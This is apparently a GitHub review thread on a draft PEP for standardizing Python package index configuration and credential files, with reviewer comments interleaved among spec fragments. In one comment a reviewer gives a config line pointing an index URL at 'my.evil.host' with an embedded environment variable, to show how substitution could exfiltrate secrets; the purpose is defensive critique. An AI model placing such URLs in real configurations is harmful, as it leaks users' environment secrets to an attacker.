    [[package_indexes]]
    name = "pypi"
    url = "https://pypi.org/simple"

    [[package_indexes]]
    name = "testpypi"
    url = "https://test.pypi.org/legacy"

    [[credentials]]
    package_index_name = "pypi"
    username = "dl_user"
    password = "dl_pass"

    [[credentials]]
    package_index_name = "testpypi"
    username = "ul_user"
    password = "ul_pass"
```

What do you think?

Reviewer 3: >@vadave do you have a suggestion on what this syntax could be like?

I'd rather not introduce "different" keys for env-var based values. Instead, I'd suggest a special syntax that signals the value should be pulled from the env. Something like: 
```
   [[package_indexes]]
    name = "testpypi"
    url = "https://test.pypi.org/legacy"

    [[credentials]]
    package_index_name = "testpypi"
    username = $("MY_USERNAME_ENV")
    password = $("MY_PASSWORD_ENV")
```
Or alternately you could have special syntax to trigger a "env var handler":
```
    username = env!("MY_USERNAME_ENV")
    password = env!("MY_PASSWORD_ENV")
```

This same syntax could be extended to support other types of references  (e.g. `include!("/path/to/file")` )

Reviewer: > I've heard many of those arguments but don't think they hold up under scrutiny. While it's true that env var-based creds can be stolen, they also enable use of automation to create short-lived creds that greatly limit the blast radius of a compromise

I  was more thinking about the possibility of using this configuration file to steal other environment variables, by inducing a package manager to contact a particular server:

```
...
name = "my_server"
url = "https://my.evil.host/%LOGONSERVER%/"
```

Of course, if you manage to inject this kind of setting, you have plenty of alternative approaches, as I mentioned above (my fault for thinking a throwaway comment about security would be ignored in favour of my main point, which is that env variable substitutions in configuration files have been tried, failed, and deprecated before, so we should find out why before forging ahead).

Reviewer 3: Agree that alternate approaches could just as easily grab and exfiltrate env vars, but also agree that it makes sense to limit this functionality to prevent grabbing any arbitrary env var, perhaps by requiring a certain prefix to the env vars used in this fashion. Maybe something like `PIVAR_` (package index variable)? 

This isn't 100% bulletproof, but does narrow the scope of the exposure. 

And I'm definitely interested in perspectives on why past approaches have been deprecated so we don't repeat the mistakes of the past. For my day job I'm neck-deep in cloud native/zero trust efforts, and env vars are widely used to inject those configs at runtime (using a variety of different tools depending on the particulars of the situation).

``config.toml``. If not specified, it will be used as the first package index by
default. However, by explicitly defining it, the repository attributes can be used and
it can be prioritized differently.

Package index priority
''''''''''''''''''''''

Tools should respect priority by acting as if all lower priority package index were not
specified when a higher priority package index satisfies the task. Tools that choose not
to respect priority MUST display a warning to users when a non-zero priority value is
being ignored. It is acceptable for tools to be less efficient in order to handle
prioritized package indexes, for example, by not performing queries in parallel.

Configuration file discovery
----------------------------

The locations of the configuration files (``config.toml`` and ``auth.toml``) vary slightly across platforms. You may have global, per-user and per-environment configuration:

If multiple configuration files are found, then they are merged in the following order:

1. The global files are read
2. The per-user files are read
3. The per-environment files are read

Global
''''''

> * Unix: ``/etc/.config/python/``

Reviewer 5: This is non-standard. The correct path should be `/etc/python`.

Author: > I have left a few comments, but overall I like the idea.

👍 😃 

> One thought on wording: [PEP 508](https://www.python.org/dev/peps/pep-0503/) calls `https://pypi.org/simple` and the like a "Python package repository". I think distutils came up the with name "index" and it stuck. But to be consistent with other PEPs (including [PEP 458](https://www.python.org/dev/peps/pep-0458/) and [PEP 658](https://www.python.org/dev/peps/pep-0658/)) I would call them "repositories" or "Python package repositories".

Earlier, I actually referred to this as repositories:
https://github.com/fredrikaverpil/peps/pull/2/commits/d29137035b23ae448a57521ba0c8d3159150a008

But after having discussed some with @abn we settled on "indexes". Maybe we need to go back and look at this again because I think this discussion might have happened outside of this PR. I can't find it right now. I recall I went to the warehouse repo, the pypa repo and just read and realized "indexes" what was used everywhere. I recall reading that a repository basically holds these indexes (or indices).

> I also dislike the word "indexes" ;)

Hehe, yeah I am a bit torn here too...

Author: I updated this. Please have a look, and resolve this conversation if you are happy 😃

* macOS: ``/Library/Application Support/python/``
* Windows: ``%PROGRAMDATA%\Python``

Per-user
''''''''

> * Unix: ``$HOME/.config/python/``

Reviewer 4: I would use `$XDG_CONFIG_HOME/python`, with a fallback default of `$HOME/.config/python`

https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html

Author: Yes, very nice. I added that in. Please have a look and resolve this conversation if you think it looks good.

* macOS: ``$HOME/.config/python/``
* Windows: ``%APPDATA%\Python\`` (note, this is Roaming app data, not Local)

Per-environment
'''''''''''''''

* Unix: ``sys.prefix``
* macOS: ``sys.prefix``
* Windows: ``sys.prefix``

> 

Author: @abn @zooba what do you think about simply specifying the indexes/credentials per-project?

```suggestion
Per-project
'''''''''''
``pyproject.toml`` holds all index config and/or credentials that would otherwise be specified in ``config.toml`` and ``auth.toml``.

```

Reviewer 2: I don't think credentials should be here. Index configuration sure. But that just looks at formalising what poetry defines as sources right?

Reviewer: I think anywhere you specify an index URL, you should be able to specify the credentials needed to access that URL.

Should you _always_ specify them there? Probably not, security risks and all. But there's no reason to forbid it. Credentials are often included in the URL (e.g. `https://user:pass@site.com`).

Should you be able to specify/override them in another config file? Yes. Which means if you specify an index name in multiple files, they'll merge together in some predictable manner.

Then if the auth is only in the project's TOML file (or one that's explicitly passed to the tool through a CLI option or environment variable), it'll merge in just the same as if it were specified anywhere else.

In other words, there's one complete schema of options, and one set of rules for merging multiple TOML files to fill out that single set of options. (Then ideally a shared library to do that merge for everyone.)

PEP: 9999

> Title: Package index configuration standardization

Reviewer 2: ```suggestion
Title: Specifying Package index configuration
```

Maybe?

Author: Fredrik Averpil <fredrik at averpil.com>
Status: Draft
Type: Informational
Created: 05-May-2021
Post-History: <dates of postings to python-ideas and/or python-dev>

Abstract
========

This PEP standardizes configuration of Python package indexes.

Initially, this standard is limited to support package indexes which are deployments of
Warehouse [1]_ (like PyPI.org [2]_) but can in the future be extended to support other

> types of package indexes.

Reviewer 2: ```suggestion
This PEP specifies how Python package index configuration should be configured independent of the client tools using them. As part of this specification, a new configuration file is introduced for client tools to use to read index specific configuration. 

We idenitfy a Package index as a service that implements the JSON API and/or Legacy API as described by the Warehouse [1]_ project (like PyPI.org [2]_) . In the future, this can be extended to support other package sources like link soruces (html).
```

This makes me wonder, if the configuration should include something like capabilities (JSON API, Legacy/Simple API). Are we covering only the "how to connect" part or "what the index is capable of" part as well? (this could be scope creep)

Further there is definitely the issue of the [fetch](https://warehouse.pypa.io/api-reference/legacy.html#simple-project-api) and [upload](https://warehouse.pypa.io/api-reference/legacy.html#upload-api) paths being different for an index.

Motivation
==========

Workflow tools come up with their own configuration mechanisms for Python package
indexes, as there is no standard for this. This causes fragmentation and
pain points.

Examples of such configuration files:

* Pip's ``pip.conf`` and ``pip.ini``
* Packaging's ``.pypirc`` (also used by tools like Flit and Twine)
* Poetry's ``config.toml`` and ``auth.toml``

Rationale
=========

While this PEP aim to come up with a unified Python package index configuration,
thought has been given so to be able to extend the configuration later. For example,
Warehouse [1]_ repositories are assumed in this PEP, but a ``type`` attribute could be

> introduced which would default to e.g. ``warehouse`` down the line, to allow for other

Reviewer 2: I keep wondering if type is the right attribute here (this can be discussed later) but effectively what tools care about is what capabilities are exposed by an index. The issue with `type` can be that we end up enumeration every new type that people try to implement - artifactory, nexus, azure, gitlab, github etc.

Reviewer 4: I think this PEP should be limited in scope to [PEP 503](https://www.python.org/dev/peps/pep-0503/) repositories, which includes Warehouse, devpi and Artifactory. A future PEP could extend this to include a hypothetical new types, but currently PEP 503 is the only standard.

I would replace footnote 1 (and the references to Warehouse) with a link to PEP 503 -- Warehouse is just one implementation, but the PEP provides the specification, and all repositories meeting that spec are interoperable.

Author: This is great input, @domdfconfig. Thank you. I believe GitLab is also covered here (haven't double checked this).

Author: This is great input, @domdfcoding. Thank you. I believe GitLab is also covered here (haven't double checked this).

=====================

[How could a malicious user take advantage of this new feature?]

How to Teach This
=================

[How to teach users, new and experienced, how to apply the PEP to their work.]

Reference Implementation
========================

[Link to any existing implementation and details about its state, e.g. proof-of-concept.]

Rejected Ideas
==============

Base64 encoding for passwords
'''''''''''''''''''''''''''''

Base64 encoding for passwords were considered, to avoid "over the shoulder" peeking.
However, this complicates being able to tell the difference between a password and a token.

Package index definition order dictates priority order
''''''''''''''''''''''''''''''''''''''''''''''''''''''

The order in which the package indexes are defined in ``config.toml`` and/or
``auth.toml`` will not be used as the order of priority in which packages are to be
discovered.

Shadowing
'''''''''

Shadowing implies "fallback" and the instructions "Use package from this index" implies
this takes priority. This can be cause for a fair amount of reasoning issues and can
also have concerns around PEP-610 [3]_ and lock files. With shadowing, behavior of

> downstream tools are dictated.

Author: @abn maybe you can have a quick look at the wording here?

Reviewer 2: ```suggestion
Shadowing can imply "fallback" and the behaviour is not deterministic. This can potentially make it harder to reason about runtime behaviour. In cases where PEP-610 [3]_ and/or lock files are used, the non-deterministic bhaviour can cause conflicts with downstream tool's intended behaviour.
```
